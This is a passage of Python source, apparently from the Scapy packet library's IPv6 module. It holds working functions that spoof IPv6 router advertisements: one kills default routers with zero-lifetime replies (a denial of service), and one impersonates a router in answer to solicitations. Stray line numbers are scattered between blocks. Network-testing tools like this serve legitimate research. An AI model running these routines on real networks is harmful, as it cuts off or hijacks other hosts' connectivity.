    # or the one of the sending interface as a fallback.
    src_lladdr = src_lladdr or get_if_hwaddr(iface)

    # Ethernet header: only set the addresses that were explicitly requested
    l2_fields = {}
    for name, value in (("src", src_mac), ("dst", dst_mac)):
        if value:
            l2_fields[name] = value

    # IPv6 header: without an explicit destination, fall back to the
    # solicited-node multicast address associated with the target.
    if not dst:
        packed_target = inet_pton(socket.AF_INET6, target)
        dst = inet_ntop(socket.AF_INET6, in6_getnsma(packed_target))
    l3_fields = {"src": src, "dst": dst} if src else {"dst": dst}

    ns = (Ether(**l2_fields) /
          IPv6(**l3_fields) /
          ICMPv6ND_NS(tgt=target) /
          ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr))

    sendp(ns, inter=inter, loop=loop, iface=iface, verbose=0)
3984
3985
def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None,
                                   ip_src_filter=None, reply_mac=None,
                                   tgt_mac=None):
    """
    Monitor incoming RA messages sent by default routers (RA with a
    non-zero Router Lifetime value) and invalidate them by immediately
    replying with a fake RA advertising a zero Router Lifetime value.

    The result on receivers is that the router is immediately invalidated,
    i.e. the associated entry is discarded from the default router list
    and the destination cache is updated to reflect the change.

    By default, the function considers all RA messages with a non-zero
    Router Lifetime value but provides configuration knobs to filter the
    RA sent by specific routers (Ethernet or IPv6 source address).
    With regard to emission, the fake RA is always addressed to the
    all-nodes multicast address (ff02::1) at the IPv6 level; a specific
    Ethernet destination can be set in order for the DoS to apply only to
    a specific host.

    This function blocks in sniff() and does not return a value.

    More precisely, following arguments can be used to change the behavior:

    iface: a specific interface (e.g. "eth0") of the system on which the
           DoS should be launched. If None is provided conf.iface is used.

    mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
         Only RA messages received from this source will trigger replies.
         If other default routers advertised their presence on the link,
         their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific mac address.

    ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
         on. Only RA messages received from this source address will trigger
         replies. If other default routers advertised their presence on the
         link, their clients will not be impacted by the attack. The default
         value is None: the DoS is not limited to a specific IPv6 source
         address.

    reply_mac: allow specifying a specific source mac address for the reply,
         i.e. to prevent the use of the mac address of the interface.

    tgt_mac: allow limiting the effect of the DoS to a specific host,
         by sending the "invalidating RA" only to its mac address.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Check if packet req is an RA from a default router matching the
        filters. Return 1 if so, 0 otherwise.
        """

        if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req):
            return 0

        mac_src = req[Ether].src
        if mac_src_filter and mac_src != mac_src_filter:
            return 0

        ip_src = req[IPv6].src
        if ip_src_filter and ip_src != ip_src_filter:
            return 0

        # Check if this is an advertisement for a Default Router
        # by looking at Router Lifetime value
        if req[ICMPv6ND_RA].routerlifetime == 0:
            return 0

        return 1

    def ra_reply_callback(req, reply_mac, tgt_mac, iface):
        """
        Callback that sends an RA with a 0 lifetime, spoofing the IPv6
        source address of the received RA.
        """

        # Let's build a reply and send it

        src = req[IPv6].src

        # Pick the link-layer address to advertise *before* walking the
        # Prefix Information options: looking it up afterwards used to miss
        # a Source Link-Layer Address option located behind a PIO, because
        # the walk detached everything following the first PIO from req.
        if ICMPv6NDOptSrcLLAddr in req:
            mac = req[ICMPv6NDOptSrcLLAddr].lladdr
        else:
            mac = req[Ether].src

        # Prepare packets parameters
        ether_params = {}
        if reply_mac:
            ether_params["src"] = reply_mac

        if tgt_mac:
            ether_params["dst"] = tgt_mac

        # Basis of fake RA (high pref, zero lifetime)
        rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1")
        rep /= ICMPv6ND_RA(prf=1, routerlifetime=0)

        # Add it every PIO from the request ...
        tmp = req
        while ICMPv6NDOptPrefixInfo in tmp:
            pio = tmp[ICMPv6NDOptPrefixInfo]
            tmp = pio.payload
            # Strip the trailing options from a copy, so that the sniffed
            # packet itself is left untouched.
            pio = pio.copy()
            del pio.payload
            rep /= pio

        # ... and source link layer address option
        rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac)

        sendp(rep, iface=iface, verbose=0)

        print("Fake RA sent with source address %s" % src)

    if not iface:
        iface = conf.iface
    # To prevent sniffing our own traffic
    if not reply_mac:
        reply_mac = get_if_hwaddr(iface)
    sniff_filter = "icmp6 and not ether src %s" % reply_mac

    sniff(store=0,
          filter=sniff_filter,
          lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter),
          prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface),
          iface=iface)
4106
4107
def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None,
                           ip_src_filter=None):
    """
    Watch the link for Router Solicitation (RS) messages and answer each of
    them by sending the provided RA message. The RA is emitted at layer 2
    through sendp(), which means that a packet starting at the IPv6 layer
    will not work: it must include the link layer.

    An example is probably the best explanation:

      >>> ra  = Ether()/IPv6()/ICMPv6ND_RA()
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64)
      >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64)
      >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55")
      >>> NDP_Attack_Fake_Router(ra, iface="eth0")
      Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573
      Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae
      ...

    The behavior can be tuned with the following arguments:

      ra: the RA message sent in response to each received RS message.

      iface: the interface (e.g. "eth0") on which RS messages are monitored
             and the RA is sent. conf.iface is used when none is provided.

      mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on.
             Only RS messages received from this source trigger a reply.
             The provided RA is never modified: to reach only the sender of
             the RS when using this option, set the Ethernet destination
             address of your RA to the same value.
             Defaults to None, i.e. no filtering on the Ethernet source of
             the RS.

      ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter
             on. Only RS messages received from this source address trigger
             a reply. As for the previous argument, you will probably want
             to set a specific Ethernet destination address in the RA when
             using it.
    """

    def is_request(req, mac_src_filter, ip_src_filter):
        """
        Tell whether req is an RS accepted by the filters (1) or not (0)
        """

        # An RS carried by IPv6 over Ethernet is required
        for layer in (Ether, IPv6, ICMPv6ND_RS):
            if layer not in req:
                return 0

        l2_src = req[Ether].src
        if mac_src_filter and l2_src != mac_src_filter:
            return 0

        l3_src = req[IPv6].src
        if ip_src_filter and l3_src != ip_src_filter:
            return 0

        return 1

    def ra_reply_callback(req, iface):
        """
        Send the RA in reply to the RS and report it
        """

        solicitor = req[IPv6].src
        sendp(ra, iface=iface, verbose=0)
        print("Fake RA sent in response to RS from %s" % solicitor)

    def accept(pkt):
        # Per-packet filter handed over to sniff()
        return is_request(pkt, mac_src_filter, ip_src_filter)

    def answer(pkt):
        # Per-packet action handed over to sniff()
        return ra_reply_callback(pkt, iface)

    iface = iface or conf.iface

    sniff(store=0,
          filter="icmp6",
          lfilter=accept,
          prn=answer,
          iface=iface)
4187
4188#############################################################################
4189# Pre-load classes ##
4190#############################################################################
4191
4192
def _get_cls(name):
    """
    Return the module-level object called 'name', or Raw when this module
    defines no such name.
    """
    module_namespace = globals()
    return module_namespace.get(name, Raw)
4195
4196
def _load_dict(d):
    """
    Replace in place every value of d (a name) by the object _get_cls()
    resolves it to. Keys are left untouched.
    """
    for key in list(d):
        d[key] = _get_cls(d[key])
4200
4201
# Swap, in place, the names stored as values of these lookup tables for the
# module-level objects bearing those names. _get_cls() falls back to Raw for
# any name that is not defined in this module.
_load_dict(icmp6ndoptscls)
_load_dict(icmp6typescls)
_load_dict(ipv6nhcls)
4205
4206#############################################################################
4207#############################################################################
4208# Layers binding #
4209#############################################################################
4210#############################################################################
4211
# Register IPv6 (and the IPv46 dispatcher) in the layer 3 / layer 2 type
# tables of the configuration.
conf.l3types.register(ETH_P_IPV6, IPv6)
conf.l3types.register_num2layer(ETH_P_ALL, IPv46)
# NOTE(review): 31 is presumably a link-type number - confirm its meaning
conf.l2types.register(31, IPv6)
conf.l2types.register(DLT_IPV6, IPv6)
conf.l2types.register(DLT_RAW, IPv46)
conf.l2types.register_num2layer(DLT_RAW_ALT, IPv46)

# IPv6 on top of the various lower layers (0x86dd in their type field)
bind_layers(Ether, IPv6, type=0x86dd)
bind_layers(CookedLinux, IPv6, proto=0x86dd)
bind_layers(GRE, IPv6, proto=0x86dd)
bind_layers(SNAP, IPv6, code=0x86dd)
# AF_INET6 values are platform-dependent. For a detailed explanation, read
# https://github.com/the-tcpdump-group/libpcap/blob/f98637ad7f086a34c4027339c9639ae1ef842df3/gencode.c#L3333-L3354  # noqa: E501
if WINDOWS:
    bind_layers(Loopback, IPv6, type=0x18)
else:
    bind_layers(Loopback, IPv6, type=socket.AF_INET6)
# Upper layers selected through the Next Header (nh) field
bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP)
bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP)
bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP)
bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP)
# Tunneling: IPv6 in IPv4, IPv6 in IPv6, IPv4 in IPv6 and GRE over IPv6
bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6)
bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6)
bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP)
bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)